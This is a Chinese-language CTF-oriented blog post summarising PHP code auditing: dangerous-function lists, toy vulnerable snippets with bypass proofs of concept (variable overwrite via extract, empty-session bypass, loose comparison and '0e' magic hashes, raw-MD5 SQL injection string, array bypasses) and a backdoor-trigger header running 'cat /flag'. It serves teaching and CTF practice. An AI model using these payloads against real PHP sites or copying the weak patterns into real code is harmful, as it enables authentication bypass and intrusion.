php代码审计总结

admin
admin
admin
100990
文章
86
评论
2021年9月25日23:40:20评论119 views字数 3284阅读10分56秒阅读模式

作者:tzzzez  编辑:白帽子社区运营团队




    "白帽子社区在线CTF靶场BMZCTF,欢迎各位在这里练习、学习,BMZCTF全身心为网络安全赛手提供优质学习环境,链接(http://www.bmzclub.cn/)

"    


在php中可由用户输入的变量

$_SERVER$_GET$_POST$_COOKIE$_REQUEST$_FILES

存在命令注入的函数

systemexecpassthrushell_execpopenproc_openpcntl_exec


XSS和CSRF的函

echoprintprintfvprintf<%=$test%>

存在文件包含的函数

includeinclude_oncerequirerequire_onceshow_sourcehighlite_filereadfileflie_get_contentsfopen

存在代码注入的函数

evalpreg_replaceassertcall_user_funccall_user_func_arraycreate_function

存在SQL注入的语句

insertupdateselectdelete

文件管理函数

copyrmdirunlinkdeletefwritechmodfgetcfgetcsvfgetsfgetssfilefile_get_contentsfreadreadfileftruncatefile_put_contentsfputcsvfputs

对于此类函数,可以使用php伪协议进行一个绕过。

<?php$a=$_GET['a'];if(stripos($a,'.')){    echo 'no';    return ;}$data = @file_get_contents($a,'r');if($data=="WHT is a good family!"){    require("flag.txt");    echo "flag";}?>

GET形式传入参数a,a不能含有.,且变量a必须为WHT is a good family!

使用php伪协议进行一个传参。

php代码审计总结

文件上传函数

move_uploaded_file

变量覆盖函数

extract

<?php $flag='flag.txt';extract($_GET); if(isset($a)) {    $content=trim(file_get_contents($flag));    //将flag文件的内容赋值给content变量    if($a==$content)    {        echo'ctf{xxx}';    }   else   {    echo'no';   }   } ?>

"extract($_GET)"此函数将GET传入的参数都重新赋值了, $content的值为flag.txt的内容,只有a和content的值相等时,才会输出flag,所以将$flag赋值一个不存在的文件,那么$content的值也就为空,此时$content也就变的可控了。

POC:

a=&flag=tzzzez

Session绕过

<?php $flag = "flag{xxxx}"; session_start();if (isset ($_GET['password'])) {    if ($_GET['password'] == $_SESSION['password'])        die ('Flag: '.$flag);    else        print 'Wrong';}mt_srand((microtime() ^ rand(1, 10000)) % rand(1, 10000) + rand(1, 10000));?>

Session的password在未登陆时为空,我们只要上传一个空的paasword即可绕过。

php代码审计总结


比较相等绕过

MD5md5('240610708')==md5('QNKCDZO')md5('aabg7XSs')==md5('aabC9RqS')SHA1sha1('aaroZmOk')==sha1('aaK1STfY')sha1('aaO8zKZF')==sha1('aa3OFF9m')明文'0010e2'=='1e3''0x1234Ab'=='1193131''0xABCdef'==' 0xABCdef'

弱类型整型比较

<?php error_reporting(0);$flag = "flag{test}"; $temp = $_GET['password'];is_numeric($temp)?die("no numeric");   if($temp>1336){    echo $flag;} ?>

当一个整形和一个其他类型行比较的时候,会先把其他类型intval再比。

POC:

password=1377a

MD5函数true绕过

$password = $_GET['password'];$sql = "SELECT * FROM users WHERE password = '".md5($password,true)."'";

ffifdyop
129581926211651571912466741651878684928

preg_match绕过

    1.数组绕过
    2.回溯次数限制绕过
    3.添加换行符 n 和 %0a

strpos()绕过

    strpos()找的是字符串,那么传一个数组给它,strpos()出错返回null。

sha1()绕过

<?php $flag = "flag{xxxx}"; if (isset($_GET['name']) and isset($_GET['password'])){    if ($_GET['name'] == $_GET['password'])        echo 'Your password can not be your name!';    else if (sha1($_GET['name']) === sha1($_GET['password']))      die('Flag: '.$flag);    else        echo 'Invalid password.';}else    echo 'Login first!';?>
需要构造一对哈希值相等但明文不同的字符串,这里sha1函数无法处理数组,当处理数组时会报错返回False,这样就使得2个参数的哈希值“相等”,这里传参2个不同的数组即可绕过所有if。

php代码审计总结

MD5碰撞

PHP在处理哈希字符串时,会利用”!=”或”==”来对哈希值进行比较,它把每一个以”0E”开头的哈希值都解释为0,所以如果两个不同的密码经过哈希以后,其哈希值都是以”0E”开头的,那么PHP将会认为他们相同,都是0。

0e开头的md5和原值:QNKCDZO0e830400451993494058024219903391QNKCDZO0e8304004519934940580242199033912406107080e462097431906509019562988736854s878926199a0e545993274517709034328855841020s155964671a0e342768416822451524974117254469s214587387a0e848240448830537924465865611904s214587387a0e848240448830537924465865611904s878926199a0e545993274517709034328855841020s1091221200a0e940624217856561557816327384675

PHP版本存在漏洞的函数

User-Agentt: zerodiumsystem("cat /flag");

值不等MD5相等,用两个不能MD5转换的值就可以。

传数组,strcmp()用两个无法比较的值,数组和字符串不可比较。

往期精彩文章




MISC中常用python脚本
第五空间网络安全大赛 WHT WRITEUP
羊城杯-WP
工作中最常用的Linux命令,排查问题必备




php代码审计总结
技术支持:白帽子社区团队
— 扫码关注我们 


相关推荐: PHP代码审计学习

                  这是一次分享准备。自己还没有总结这个的能力,这次就当个…

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年9月25日23:40:20
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   php代码审计总结https://cn-sec.com/archives/550071.html

发表评论

匿名网友 填写信息